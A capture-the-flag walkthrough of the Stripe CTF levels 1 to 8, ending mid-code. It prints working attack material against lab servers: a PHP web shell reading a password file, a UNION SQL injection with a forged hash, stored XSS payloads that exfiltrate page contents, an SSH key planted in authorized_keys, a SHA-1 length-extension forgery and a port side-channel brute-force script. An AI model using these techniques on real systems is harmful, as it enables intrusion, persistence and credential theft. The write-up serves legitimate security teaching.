Excellent, you are now on Level 1, the Guessing Game. All you have to do is guess the combination correctly, and you’ll be given the password to access Level 2! We’ve been assured that this level has no security vulnerabilities in it (and the machine running the Guessing Game has no outbound network connectivity, meaning you wouldn’t be able to extract the password anyway), so you’ll probably just have to try all the possible combinations. Or will you…?
You can play the Guessing Game at https://level01-2.stripe-ctf.com/user-jkcftciszp. The code for the Game can be obtained from git clone https://level01-2.stripe-ctf.com/user-jkcftciszp/level01-code, and is also included below.
So quickly looking at the code, here’s the block we’re interested in….
    <?php
      $filename = 'secret-combination.txt';
      extract($_GET);
      if (isset($attempt)) {
        $combination = trim(file_get_contents($filename));
        if ($attempt === $combination) {
          echo "<p>How did you know the secret combination was" .
               " $combination!?</p>";
          $next = file_get_contents('level02-password.txt');
          echo "<p>You've earned the password to the access Level 2:" .
               " $next</p>";
        } else {
          echo "<p>Incorrect! The secret combination is not $attempt</p>";
        }
      }
    ?>
So let’s step through the code and see what’s happening:
    • creates $filename, storing ‘secret-combination.txt’
    • extracts $_GET (all GET parameters supplied by the user)
    • if $attempt is set:
      • declares $combination with the trim()’d contents of $filename
      • if $attempt and $combination are equal:
        • prints the contents of ‘level02-password.txt’
      • else:
        • prints “Incorrect!”
So let’s look at what extract() is actually doing…

int extract ( array &$var_array [, int $extract_type = EXTR_OVERWRITE [, string $prefix = NULL ]] )
Import variables from an array into the current symbol table.
Checks each key to see whether it has a valid variable name. It also checks for collisions with existing variables in the symbol table.
If  extract_type  is not specified, it is assumed to be  EXTR_OVERWRITE.
Well, look at that: they didn’t specify an extract_type, so it defaults to EXTR_OVERWRITE, which means, “If there is a collision, overwrite the existing variable.”
There was even a nice little warning for us:
Do not use extract() on untrusted data, like user input (i.e. $_GET, $_FILES, etc.).
So now looking back at the code, we can see that they declare $filename before they use extract(), so this gives us the opportunity to create a collision and overwrite the existing variable with our GET parameters.

In simple terms, extract() creates variables from whatever you supply in your GET request. Here, the request /?attempt=SECRET creates a variable $attempt that stores the value “SECRET”, so we could also send “/?attempt=SECRET&filename=random_file.txt”. extract() will then overwrite the original $filename with our supplied value, “random_file.txt”.

So what can we do to make these match? Notice that $combination stores the result of file_get_contents() on $filename, passed through trim(). If file_get_contents() returns false because the file does not exist, trim() returns an empty string. So if we supply a file that does not exist and an empty $attempt, they will match…
So let’s supply:
/?attempt=&filename=file_that_does_not_exist.txt
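To make the logic concrete, here is a small Python model of the PHP flow. It is only a sketch: the guess() function and the files dictionary are hypothetical stand-ins for the script and the server's filesystem, and dict.update() plays the role of extract() with EXTR_OVERWRITE.

```python
def guess(get_params, files):
    """Model of the level's check; `files` maps filename -> contents."""
    variables = {"filename": "secret-combination.txt"}
    # extract($_GET) with EXTR_OVERWRITE: user-supplied keys replace existing variables.
    variables.update(get_params)
    if "attempt" not in variables:
        return None
    # A missing file yields None here, standing in for PHP's false.
    contents = files.get(variables["filename"])
    # trim(false) gives an empty string in PHP; model that explicitly.
    combination = (contents or "").strip()
    return variables["attempt"] == combination

# Hypothetical filesystem contents.
files = {"secret-combination.txt": "12345\n"}

print(guess({"attempt": ""}, files))                          # wrong guess
print(guess({"attempt": "", "filename": "nope.txt"}, files))  # overwritten $filename
```

The second call succeeds without knowing the combination, because both sides of the comparison collapse to an empty string.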

Level 2:

You are now on Level 2, the Social Network. Excellent work so far! Social Networks are all the rage these days, so we decided to build one for CTF. Please fill out your profile at https://level02-2.stripe-ctf.com/user-alucnmpgjr. You may even be able to find the password for Level 3 by doing so.
The code for the Social Network can be obtained from git clone https://level02-2.stripe-ctf.com/user-alucnmpgjr/level02-code, and is also included below.
So, this one is pretty simple. The areas we’re interested in are:
*snip*

$dest_dir = "uploads/";

*snip*

<form action="" method="post" enctype="multipart/form-data">
   <input type="file" name="dispic" size="40" />
   <input type="submit" value="Upload!">
</form>
 
<p>
   Password for Level 3 (accessible only to members of the club):
   <a href="password.txt">password.txt</a>

 
*snip*
Looking at this, we have an ‘uploads’ directory that we can access, and a form that we can use to upload images. There is no check on the uploaded file’s extension at all. Let’s try uploading a file that is not an image but a PHP script.
<?php
$output = shell_exec('cat ../password.txt');
echo "<pre>$output</pre>";
?>
Then just browse to the /uploads/ dir and click on your uploaded php file.
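For contrast, this is roughly the kind of check the upload handler is missing. It is a minimal Python sketch, not the level's code: the function name and the allowlist are assumptions, and an extension check alone is not a complete defense (the uploads directory should also not execute scripts).

```python
import os

# Hypothetical allowlist of image extensions.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}

def is_allowed_upload(filename):
    # Drop any directory components, then compare the final extension
    # case-insensitively against the allowlist.
    base = os.path.basename(filename)
    ext = os.path.splitext(base)[1].lower()
    return ext in ALLOWED_EXTENSIONS

print(is_allowed_upload("avatar.PNG"))
print(is_allowed_upload("shell.php"))
```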

Level 3:

After the fiasco back in Level 0, management has decided to fortify the Secret Safe into an unbreakable solution (kind of like Unbreakable Linux). The resulting product is Secret Vault, which is so secure that it requires human intervention to add new secrets.
A beta version has launched with some interesting secrets (including the password to access Level 4); you can check it out at https://level03-2.stripe-ctf.com/user-cmzqxoblip. As usual, you can fetch the code for the level (and some sample data) via git clone https://level03-2.stripe-ctf.com/user-cmzqxoblip/level03-code, or you can read the code below.

Ok, so let’s look at some important parts. We know it’s sqlite3 again and how it is setup:

# CREATE TABLE users (
#   id VARCHAR(255) PRIMARY KEY AUTOINCREMENT,
#   username VARCHAR(255),
#   password_hash VARCHAR(255),
#   salt VARCHAR(255)
# );
And
    query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)
    cursor.execute(query)

    res = cursor.fetchone()
    if not res:
        return "There's no such user {0}!\n".format(username)
    user_id, password_hash, salt = res

    calculated_hash = hashlib.sha256(password + salt)
    if calculated_hash.hexdigest() != password_hash:
        return "That's not the password for {0}!\n".format(username)

So we can see that the statement is built directly from our supplied username, which of course makes it injectable. They’re selecting the id, password_hash, and salt from users where the username equals our input. Let’s load up our own sample database, make some test queries, and see what happens….

sqlite> insert into users values ('myid', 'myusername', '0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60', 'SUPER_SECRET_SALT');
sqlite> select id, password_hash, salt FROM users where username = 'myusername';
myid|0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60|SUPER_SECRET_SALT
So, let’s do a union select after it and supply exactly what we would like back.
sqlite> select id, password_hash, salt FROM users where username = 'myusername' union select 'new id', 'new hash', 'new salt';
myid|0be64ae89ddd24e225434de95d501711339baeee18f009ba9b4369af27d30d60|SUPER_SECRET_SALT
new id|new hash|new salt

As you can see, by using a union select we can define the content of the response: the ‘new id’, ‘new hash’, and ‘new salt’ values all came back in our result. Looking at how the code does the comparison, we can see that it computes sha256(password + salt) and compares it to the hash returned by the SQL statement.

Let’s supply our own hash and compare them to each other!
>>> import hashlib
>>> print hashlib.sha256("lolpassword" + "lolsalt").hexdigest()
dbb4061dc0dd72027d1c3a13b24f17b01fb163037211192c841a778fa2bba7d5
>>>
We just created our new sha256 hash with the salt ‘lolsalt’; let’s now submit our new hash injection into the SQL statement.

username: z'%20union%20select%20'1','dbb4061dc0dd72027d1c3a13b24f17b01fb163037211192c841a778fa2bba7d5','lolsalt

password:
lolpassword

The code will now take the password you submitted, hash it with the salt returned from the sql query, then compare it to the hash that was in the response (the salt and hashes that are in the response were the ones we supplied in our injection). This will lead to them matching and you receiving a message similar to this:
Welcome back! Your secret is: “The password to access level04 is: aZnRbEpSfX” (Log out)
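The whole trick can be replayed offline. Below is a minimal Python 3 sketch, assuming a simplified users table and a hypothetical login() helper that mirrors the level's string-formatted query. The existing user and its hash are made up; only the injected row matters.

```python
import hashlib
import sqlite3

def login(db, username, password):
    # Deliberately vulnerable: the username is formatted straight into the SQL,
    # as in the level's code.
    query = ("SELECT id, password_hash, salt FROM users "
             "WHERE username = '{0}' LIMIT 1").format(username)
    row = db.execute(query).fetchone()
    if row is None:
        return None
    user_id, password_hash, salt = row
    calculated = hashlib.sha256((password + salt).encode()).hexdigest()
    return user_id if calculated == password_hash else None

# Hypothetical database contents.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (id TEXT, username TEXT, password_hash TEXT, salt TEXT)")
db.execute("INSERT INTO users VALUES ('1', 'bob', 'not-a-real-hash', 'bobsalt')")

# We choose the password and salt, so we can compute a hash that will verify.
forged_hash = hashlib.sha256(b"lolpassword" + b"lolsalt").hexdigest()
payload = "z' UNION SELECT '1', '{0}', 'lolsalt".format(forged_hash)

print(login(db, payload, "lolpassword"))  # logs in as id '1' without bob's password
```

Because the user 'z' does not exist, the only row returned is the one supplied by the UNION, so the application ends up checking our password against our own hash and salt.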

Level 4:

The Karma Trader is the world’s best way to reward people for good deeds: https://level04-2.stripe-ctf.com/user-xjqcwqqyvp. You can sign up for an account, and start transferring karma to people who you think are doing good in the world. In order to ensure you’re transferring karma only to good people, transferring karma to a user will also reveal your password to him or her.
The very active user karma_fountain has infinite karma, making it a ripe account to obtain (no one will notice a few extra karma trades here and there). The password for karma_fountain’s account will give you access to Level 5.
You can obtain the full, runnable source for the Karma Trader from git clone https://level04-2.stripe-ctf.com/user-xjqcwqqyvp/level04-code. We’ve included the most important files below.
This is a nice little XSS/XSRF challenge. The goal here is to get that karma_fountain to send you some karma, which in turn will let you view their password.
When registering a new account, you can insert malicious code into the password field. That code will be rendered once you send someone karma, because the application is designed to show your password to users who receive karma from you.
The application includes jQuery, which makes our lives even easier when trying to make requests. The idea is to inject code into karma_fountain’s page that automatically makes them transfer some karma to you.
I went and created a new user named ‘whoop’ with the password:
<script>$.post("transfer", { to: "whoop", amount: "2" } );</script>
So, now that you can log in, send some karma to karma_fountain and wait… eventually the karma_fountain user will view their page and your injected code will force them to transfer karma to the user ‘whoop’.
Refresh your page until you can view karma fountain’s password on the right.
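The injection works because the stored password is written into the page without escaping. As a rough illustration in Python (the level's template code is not shown here, so render_password_cell() is a hypothetical stand-in), HTML-escaping the value on output turns the payload into inert text:

```python
import html

def render_password_cell(password):
    # Escape <, >, & and quotes so the browser shows the value as text
    # instead of parsing it as markup.
    return "<td>{0}</td>".format(html.escape(password))

stored = '<script>$.post("transfer", { to: "whoop", amount: "2" } );</script>'
print(render_password_cell(stored))
```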

Level 5:

Many attempts have been made at creating a federated identity system for the web (see OpenID, for example). However, none of them have been successful. Until today.
The DomainAuthenticator is based off a novel protocol for establishing identities. To authenticate to a site, you simply provide it username, password, and pingback URL. The site posts your credentials to the pingback URL, which returns either “AUTHENTICATED” or “DENIED”. If “AUTHENTICATED”, the site considers you signed in as a user for the pingback domain.
You can check out the Stripe CTF DomainAuthenticator instance here: https://level05-1.stripe-ctf.com/user-qoqflihezv. We’ve been using it to distribute the password to access Level 6. If you could only somehow authenticate as a user of a level05 machine…
To avoid nefarious exploits, the machine hosting the DomainAuthenticator has very locked down network access. It can only make outbound requests to other stripe-ctf.com servers. Though, you’ve heard that someone forgot to internally firewall off the high ports from the Level 2 server.
Interested in setting up your own DomainAuthenticator? You can grab the source from git clone https://level05-1.stripe-ctf.com/user-qoqflihezv/level05-code, or by reading on below.
So, this problem is just… insecure communication in general. There are a couple of issues here.
This code block handles POST requests, but it doesn’t check whether the parameters were supplied in the query string (GET) or in the POST body:
    post '/*' do
      pingback = params[:pingback]
      username = params[:username]
      password = params[:password]
This is an insecure way of checking if we’re Authenticated…
    def authenticated?(body)
      body =~ /[^\w]AUTHENTICATED[^\w]*$/
There are multiple ways of clearing this level…but Ryan O’Horo showed me his route, which was the cleanest one out of the four we tried. The whole idea is to get it to match the Authenticated regex, but on a host of level5-*.stripe-ctf.com
So…the easiest route….
POST /user-smrqjnvcis/?username=root&pingback=https://level05-1.stripe-ctf.com/user-smrqjnvcis/%3fpingback=http://level05-2.stripe-ctf.com/AUTHENTICATED%250A HTTP/1.1
The pingback URL contains a newline (%0A) so that the regular expression’s end-of-line marker matches after the word “AUTHENTICATED”, and it must be double-encoded because it’s nested inside the original pingback parameter.
This makes the application perform a pingback to a level05 host, but since we used http:// instead of https://, that host answered with a 302 redirect to the URL https://level05-2.stripe-ctf.com/AUTHENTICATED%250A . The application matched the regex against that response and authenticated the user.
I’m not going to bother showing the other routes some of us took… simply because I’m embarrassed that we made it so much harder on ourselves compared to the one-request solution used by Ryan.
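To see why the trailing newline matters for the authenticated? check, here is a short Python sketch of the same pattern. Ruby's $ matches at the end of any line, so re.MULTILINE is used to approximate it; the sample bodies are made up for illustration.

```python
import re

# Approximation of the Ruby check; MULTILINE makes "$" match before a newline
# as well as at the very end of the string.
AUTH_RE = re.compile(r"[^\w]AUTHENTICATED[^\w]*$", re.MULTILINE)

def authenticated(body):
    return AUTH_RE.search(body) is not None

# Hypothetical response bodies.
with_newline = "Location: https://level05-2.stripe-ctf.com/AUTHENTICATED\n<html>redirect</html>"
without_newline = "Location: https://level05-2.stripe-ctf.com/AUTHENTICATED more text"

print(authenticated(with_newline))     # "/" before the word, end of line right after it
print(authenticated(without_newline))  # word characters follow on the same line
print(authenticated("DENIED"))
```

Any response that merely contains the word at the end of a line, preceded by a non-word character such as "/", passes the check.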

Level 6:

After Karma Trader from Level 4 was hit with massive karma inflation (purportedly due to someone flooding the market with massive quantities of karma), the site had to close its doors. All hope was not lost, however, since the technology was acquired by a real up-and-comer, Streamer. Streamer is the self-proclaimed most streamlined way of sharing updates with your friends. You can access your Streamer instance here: https://level06-2.stripe-ctf.com/user-bqdgqqeqqd
The Streamer engineers, realizing that security holes had led to the demise of Karma Trader, have greatly beefed up the security of their application. Which is really too bad, because you’ve learned that the holder of the password to access Level 7, level07-password-holder, is the first Streamer user.
As well, level07-password-holder is taking a lot of precautions: his or her computer has no network access besides the Streamer server itself, and his or her password is a complicated mess, including quotes and apostrophes and the like.
Fortunately for you, the Streamer engineers have decided to open-source their application so that other people can run their own Streamer instances. You can obtain the source for Streamer at git clone https://level06-2.stripe-ctf.com/user-bqdgqqeqqd/level06-code. We’ve also included the most important files below.
 
Ok, so in this level we’re dealing with a unique social network. We have to find a way to view the other user’s user_info page to see their password. If you started posting some of your own posts you would find that it is susceptible to Cross-Site Scripting. So we need to find a way to get the user to view their user_info page, and then post the results so that we can view them.
We cannot use the single-quote and double-quote characters (' and "), but everything else is pretty much legal, so we can make use of JavaScript’s String.fromCharCode() and, once again, jQuery! We’ll have to break out of their script tags and then inject our code, but we also need to make sure the code doesn’t run until the entire page has loaded. They have a CSRF token, but it’s poorly implemented, since our injected code can reuse the form (and token) already on the page. Another issue you will run into is that the user_info page contains characters that are not allowed in posts, so we escape() the response data before posting it. Here’s the payload that I used before applying String.fromCharCode:
</script><script>$(document).ready(function() {$.get('user_info', function(data) {document.forms[0].body.value = escape(data); document.forms[0].submit();})});</script><script>//
And here it is after….
</script><script>$(document).ready(function() {eval(String.fromCharCode(36,46,103,101,116,40,39,117,115,101,114,95,105,110,102,111,39,44,32,102,117,110,99,116,105,111,110,40,100,97,116,97,41,32,123,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,98,111,100,121,46,118,97,108,117,101,32,61,32,101,115,99,97,112,101,40,100,97,116,97,41,59,32,100,111,99,117,109,101,110,116,46,102,111,114,109,115,91,48,93,46,115,117,98,109,105,116,40,41,59,125,41))});</script><script>//
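Converting the inner JavaScript to character codes by hand is tedious. A small helper does it; this is a Python sketch with a hypothetical function name, and the inner string is the quote-containing part of the payload shown earlier in this level.

```python
def to_from_char_code(js_source):
    # Encode each character as its code point so the payload needs no quotes.
    codes = ",".join(str(ord(ch)) for ch in js_source)
    return "eval(String.fromCharCode({0}))".format(codes)

inner = ("$.get('user_info', function(data) {document.forms[0].body.value = "
         "escape(data); document.forms[0].submit();})")

payload = ("</script><script>$(document).ready(function() {"
           + to_from_char_code(inner)
           + "});</script><script>//")
print(payload)
```

The wrapper around the eval() call contains no quote characters itself, so the final payload passes the filter.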
We can now wait and watch posts being created–you can simply keep an eye on /ajax/posts so that your XSS won’t also hit yourself. You’ll soon see a new post by the Level7 user that consists of a huge block of URL-encoded characters. Go ahead and decode them and you’ll see something like…

Level 7:

 
Welcome to the penultimate level, Level 7.
WaffleCopter is a new service delivering locally-sourced organic waffles hot off of vintage waffle irons straight to your location using quad-rotor GPS-enabled helicopters. The service is modeled after TacoCopter, an innovative and highly successful early contender in the airborne food delivery industry. WaffleCopter is currently being tested in private beta in select locations.
Your goal is to order one of the decadent Liège Waffles, offered only to WaffleCopter’s first premium subscribers.
Log in to your account at https://level07-2.stripe-ctf.com/user-dsccixwxvo with username ctf and password password. You will find your API credentials after logging in. You can fetch the code for the level via
git clone https://level07-2.stripe-ctf.com/user-dsccixwxvo/level07-code, or you can read it below. You may find the sample API client in client.py particularly helpful.
This level has a slight twist: you’ll actually be attacking their crypto. Looking at the code, you’ll see that each request is signed with a SHA1 hash of your secret followed by the raw request you made. We also need to make the request as a premium user. When you order a waffle you receive a confirmation number; if you order the premium waffle, the confirmation number will be your password to Level 8.
Here is the block of code that verifies the signature… this is how we know how it is built and that it is sha1
def verify_signature(user_id, sig, raw_params):
    # get secret token for user_id
    try:
        row = g.db.select_one('users', {'id': user_id})
    except db.NotFound:
        raise BadSignature('no such user_id')
    secret = str(row['secret'])

    h = hashlib.sha1()
    h.update(secret + raw_params)
    print 'computed signature', h.hexdigest(), 'for body', repr(raw_params)
    if h.hexdigest() != sig:
        raise BadSignature('signature does not match')
    return True

Researching SHA1, we can see that this construction is vulnerable to a length-extension attack, an attack on certain hashes that lets you append extra data to a signed message and still produce a valid hash without knowing the secret. There’s excellent documentation that describes this attack in the Flickr API Signature Forgery Vulnerability write-up. There’s also a nice script and write-up about it at vnsecurity by RD, about how he solved a similar CodeGate 2010 challenge. For my solution I used the script that was supplied on vnsecurity to solve this problem. Since we know what the raw request will be, and we know the length of the secret (14), we can append data to the raw request and generate a valid hash. Looking at the /logs/ directory, we can also view other users’ requests… in this case we’re interested in premium users, so id 1 or 2.
This is a request that was made by user_id 1:
count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo|sig:a75edb45bc6c0057e059b23bc48b84f7081a798f
As you can see, we have the raw request and the final hash… let’s append to this and generate a new valid hash, but ordering a different waffle.
droogie$ python sha-padding.py '14' 'count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo' 'a75edb45bc6c0057e059b23bc48b84f7081a798f' '&waffle=liege'
new msg: 'count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&waffle=liege'
base64: Y291bnQ9MTAmbGF0PTM3LjM1MSZ1c2VyX2lkPTEmbG9uZz0tMTE5LjgyNyZ3YWZmbGU9ZWdnb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIoJndhZmZsZT1saWVnZQ==
new sig: 4c230b26a20f192c4a258f529662d3dd0ad8b62d
And here we are… the script has supplied the correct amount of padding and given us the new raw request and a valid hash… let’s go ahead and make the request using a simple python script….
droogie$ cat post.py
import urllib
import urllib2
url = ‘https://level07-2.stripe-ctf.com/user-dsccixwxvo/orders’
data = ‘count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggox80x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x02(&waffle=liege|sig:4c230b26a20f192c4a258f529662d3dd0ad8b62d’
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
print response.read()
droogie$ python post.py
{"confirm_code": "BdxavaMIKC", "message": "Great news: 10 liege waffles will soon be flying your way!", "success": true}
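For readers who want to see what a padding script of this kind has to do, here is a self-contained Python 3 sketch of SHA-1 length extension. It is not the vnsecurity script; the function names are my own, and the demo secret is a placeholder of 14 bytes, so the signatures it prints will not match the ones in this level.

```python
import hashlib
import struct

def _rol(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def sha1_padding(total_len):
    # Padding SHA-1 appends to a message of total_len bytes:
    # 0x80, zeros up to 56 mod 64, then the bit length as a 64-bit big-endian int.
    zeros = (55 - total_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", total_len * 8)

def sha1_compress(state, block):
    # One SHA-1 compression round over a 64-byte block, starting from `state`.
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rol(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        a, b, c, d, e = ((_rol(a, 5) + f + e + k + w[i]) & 0xFFFFFFFF,
                         a, _rol(b, 30), c, d)
    return tuple((s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d, e)))

def extend(sig_hex, known_msg, secret_len, suffix):
    # The old signature is the internal state after hashing secret+msg+padding,
    # so we resume hashing from it and feed in only the suffix.
    glue = sha1_padding(secret_len + len(known_msg))
    forged_msg = known_msg + glue + suffix
    state = struct.unpack(">5I", bytes.fromhex(sig_hex))
    tail = suffix + sha1_padding(secret_len + len(forged_msg))
    for i in range(0, len(tail), 64):
        state = sha1_compress(state, tail[i:i + 64])
    return forged_msg, struct.pack(">5I", *state).hex()

# Demo with a placeholder secret (the real one is unknown to the attacker).
secret = b"A" * 14
msg = b"count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo"
sig = hashlib.sha1(secret + msg).hexdigest()

forged_msg, forged_sig = extend(sig, msg, len(secret), b"&waffle=liege")
print(forged_sig == hashlib.sha1(secret + forged_msg).hexdigest())
```

Note that extend() never touches the secret itself, only its length; the final comparison against hashlib is there purely to check the forgery.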

Level 8:

Welcome to the final level, Level 8.
HINT 1: No, really, we’re not looking for a timing attack.
HINT 2: Running the server locally is probably a good place to start. Anything interesting in the output?
UPDATE: If you push the reset button for Level 8, you will be moved to a different Level 8 machine, and the value of your Flag will change. If you push the reset button on Level 2, you will be bounced to a new Level 2 machine, but the value of your Flag won’t change.
Because password theft has become such a rampant problem, a security firm has decided to create PasswordDB, a new and secure way of storing and validating passwords. You’ve recently learned that the Flag itself is protected in a PasswordDB instance, accessible at https://level08-1.stripe-ctf.com/user-eojzgklshq/.
PasswordDB exposes a simple JSON API. You just POST a payload of the form {"password": "password-to-check", "webhooks": ["mysite.com:3000", ...]} to PasswordDB, which will respond with a {"success": true} or {"success": false} to you and your specified webhook endpoints.
(For example, try running curl https://level08-1.stripe-ctf.com/user-eojzgklshq/ -d '{"password": "password-to-check", "webhooks": []}'.)
In PasswordDB, the password is never stored in a single location or process, making it the bane of attackers’ respective existences. Instead, the password is “chunked” across multiple processes, called “chunk servers”. These may live on the same machine as the HTTP-accepting “primary server”, or for added security may live on a different machine. PasswordDB comes with built-in security features such as timing attack prevention and protection against using unequitable amounts of CPU time (relative to other PasswordDB instances on the same machine).
As a secure cherry on top, the machine hosting the primary server has very locked down network access. It can only make outbound requests to other stripe-ctf.com servers. As you learned in Level 5, someone forgot to internally firewall off the high ports from the Level 2 server. (It’s almost like someone on the inside is helping you — there’s an sshd running on the Level 2 server as well.)
To maximize adoption, usability is also a goal of PasswordDB. Hence a launcher script, password_db_launcher, has been created for the express purpose of securing the Flag. It validates that your password looks like a valid Flag and automatically spins up 4 chunk servers and a primary server.
You can obtain the code for PasswordDB from git clone https://level08-1.stripe-ctf.com/user-eojzgklshq/level08-code, or simply read the source below.

This level seems to be a little involved, but it’s easy to understand once you see what it is doing. There is a primary server, and when you launch it you supply it a 12 digit password and a socket to listen on. It will break the password up into 4 chunks of 3 characters each and spawn 4 chunk servers. Each chunk server will have a chunk from the primary and all of your requests will be compared to it. The primary server can then receive requests from you with a password. It will chunk up the supplied password and check with the chunk servers; if it receives TRUE on all 4 it will respond with TRUE, but FALSE on any of them and you’ll get a FALSE. Your goal is to figure out what is the 12 digit password that was supplied to the primary server on startup. When making a request to the primary server you can also supply it with a webhook, where it will send the response to whichever socket you supplied.

There’s a major issue here with their design….
If we bruteforce the 12 digit password, we would be looking at this many attempts:
>>> 10**12
1000000000000
If we bruteforce the chunks, we’re looking at a total of this many:
>>> 10**3*4
4000
Or only a maximum of 1000 attempts per chunk. They’ve just significantly lowered their security if there is any possible way we can tell if a chunk was correct or not, which there is of course 😉
Since the network is so locked down, we can’t actually touch the chunk servers themselves… if we could, we would just bruteforce each chunk and this challenge would be very simple… so we have to find another way to bruteforce each chunk. We also can’t try a timing attack because the developers have implemented some delays on responses to avoid this.
Well one thing we can do is get on the local network so that we can get responses from Level8, using Level2 as the description suggested.
Let’s go ahead and create a local ssh key we can use, then upload it to the Level2 server using that file upload vulnerability.
<?php
mkdir("../../.ssh");
$h = fopen("../../.ssh/authorized_keys", "w+");
fwrite($h, "ssh-rsa (MYSECRETLOCALSSHKEY)\n\n");
fclose($h);
print "DONE!\n";
?>
Cool, now we can ssh into this box:
Linux leveltwo3.ctf-1.stripe-ctf.com 2.6.32-347-ec2 #52-Ubuntu SMP Fri Jul 27 14:38:36 UTC 2012 x86_64 GNU/Linux
Ubuntu 10.04.4 LTS
Welcome to Ubuntu!
 * Documentation:  https://help.ubuntu.com/
Last login: Mon Aug 27 03:45:20 2012 from cpe-174-097-161-152.nc.res.rr.com
groups: cannot find name for group ID 4334
user-wsotctjptv@leveltwo3:~$
At this point we can create sockets and receive responses from the primary server through our webhook parameters. We’ll be able to take advantage of this and use it as a side channel attack to validate if our requests were true or false. We’ll do this by keeping track of the connections to our socket and their srcport. By default, most operating systems are lazy and will use the last srcport + 1 on a connection… so with an invalid request we know that the difference between source ports would be 2… connection to chunk server 1, then back to us with the response. But if our first chunk happened to be successful it would make a request to chunk server 1, then chunk server 2, then us… so if we are able to make an attempt multiple times and see a difference of 3 in the srcports, we know that it was a valid chunk. We can obviously repeat this process and keep track of the differences to verify the first 3 chunks, then we can just bruteforce the last chunk manually. Here’s a python script written by my co-worker Michael which does just that….

#!/usr/bin/env python

import socket
import urllib2
import json
import sys

try:
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument("--port", default=49567, type=int, help="Which port to listen for incoming connections on")
    parser.add_argument("targetURL", help="The URL of the targeted primary server")
    parser.add_argument("webhooksHost", help="Where the primary server should connect back for the webhooks")
    args = parser.parse_args()
except ImportError:
    # level02 server doesn't have argparse... grrr
    class args(object):
        port = 49567
        targetURL = sys.argv[1]
        webhooksHost = sys.argv[2]

def password_gen(length, prefix="", charset="1234567890"):
    def gen(length, charset):
        if length == 0:
            yield ""
        else:
            for ch in charset:
                for pw in gen(length - 1, charset):
                    yield pw + ch

    for pw in gen(length - len(prefix), charset):
        yield prefix + pw

def do_webhooks_connectback():
    # accept the webhook callback and report the source port it came from
    c_sock, addr = webhook_sock.accept()
    c_sock.recv(1000)
    c_sock.send("HTTP/1.0 200\r\n\r\n")
    c_sock.close()
    return addr[1]

def do_auth_request(password):
    print "Trying password:", password
    r = urllib2.urlopen(args.targetURL, json.dumps({"password":password, "webhooks":webhook_hosts}))
    port = do_webhooks_connectback()
    result = json.loads(r.read())

    print "Connect back Port:", port

    if result["success"]:
        print "Found the password!!!"
        print result
        sys.exit(0)
    else:
        return port

def calc_chunk_servers_for_password(password):
    # we need to figure out what the "current" port is, so make a request that will fail
    base_port = do_auth_request("aaa")
    # figure out what the last port number is
    final_port = do_auth_request(password)
    # we should be able to tell how many chunk servers it talked to
    return (final_port - base_port) - 1

# create the listen socket
webhook_sock = socket.socket()
webhook_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
webhook_sock.bind(("", args.port))
webhook_sock.listen(100)

webhook_hosts = ["%s:%d" % (args.webhooksHost, args.port)]

# We can guess our password by calculating how many TCP connections the primary server has
# made before connecting to our webhook. The more connections the server has made,
# the more chunks that we have correct.

prefix = ""
curr_chunk = 1

while True:
    for pw in password_gen(12, prefix):
        found_chunk = True
        for i in xrange(10):
            num_servers = calc_chunk_servers_for_password(pw)
            print "Num Servers:", num_servers
            if num_servers == curr_chunk:
                # incorrect password
                found_chunk = False
                break
            elif num_servers > curr_chunk:
                # we may have figured out a chunk... but someone else may have just made a request
                # so we will just try again
                continue
            elif num_servers < 0:
                # ran out of ports and we restarted the port range
                continue
            else:
                # somehow we regressed... abort!
                print "[!!!!] Hmmm... somehow we ended up talking to fewer servers than before..."
                sys.exit(-1)
        if found_chunk:
            # ok, we are fairly confident that we have found the next password chunk
            prefix = pw[:curr_chunk * 3] # assuming 4 chunk servers, with 3 chars each... TODO: should calc this
            curr_chunk += 1
            print "[!] Found chunk:", prefix
            break
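The script above needs the live CTF servers, so here is an offline toy model of the same side channel in Python 3. It rests on simplifying assumptions: FakePrimary is a made-up stand-in for the primary server, every outbound connection takes the next source port, and nobody else is generating traffic. That is why it does not need the retry loop the real script uses.

```python
import itertools

class FakePrimary:
    """Toy primary server: each outbound connection uses the next source port."""

    def __init__(self, password, chunk_len=3):
        self.chunk_len = chunk_len
        self.chunks = [password[i:i + chunk_len]
                       for i in range(0, len(password), chunk_len)]
        self.next_port = 40000  # arbitrary starting port for the model

    def _connect(self):
        port = self.next_port
        self.next_port += 1
        return port

    def check(self, guess):
        # Contact chunk servers in order, stopping at the first mismatch,
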